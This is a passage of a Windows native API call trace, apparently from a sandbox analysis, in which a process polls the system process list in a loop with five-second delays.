RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.853] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.857] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.858] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.859] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.860] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.860] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.861] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.861] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.864] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.864] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.867] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.867] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.868] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.868] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.868] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.872] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.873] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.876] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.876] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.877] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.877] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.877] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.881] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.882] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.884] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.884] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.885] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.886] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.891] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.891] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.893] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.894] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.894] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.895] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.895] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.898] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.899] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.907] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.907] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.908] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.909] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.909] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.913] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.914] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.916] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.916] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.917] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.917] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.917] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.920] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.921] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.923] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.923] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.924] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.924] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.924] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.928] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.928] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.931] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.931] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.932] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.932] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.932] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.935] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.936] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.938] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.938] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.939] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.939] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.939] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.942] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.943] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.945] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.945] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.946] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.947] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.947] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.951] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.951] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.953] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.953] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.954] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.955] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.955] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.960] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.961] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.963] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.964] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.964] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.965] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.971] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.972] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.973] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.974] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.975] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.975] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.976] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.980] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.981] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.983] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.983] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.985] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.985] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.990] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.991] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.993] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.993] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.994] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.995] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.995] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.000] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.001] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.002] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.003] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.004] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.004] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.004] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.010] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.011] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.012] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.012] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.013] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.014] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.014] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.018] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.019] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.021] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.021] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.022] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.022] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.022] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.026] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.027] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.028] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.029] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.029] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.030] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.030] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.035] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.038] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.039] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.040] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, 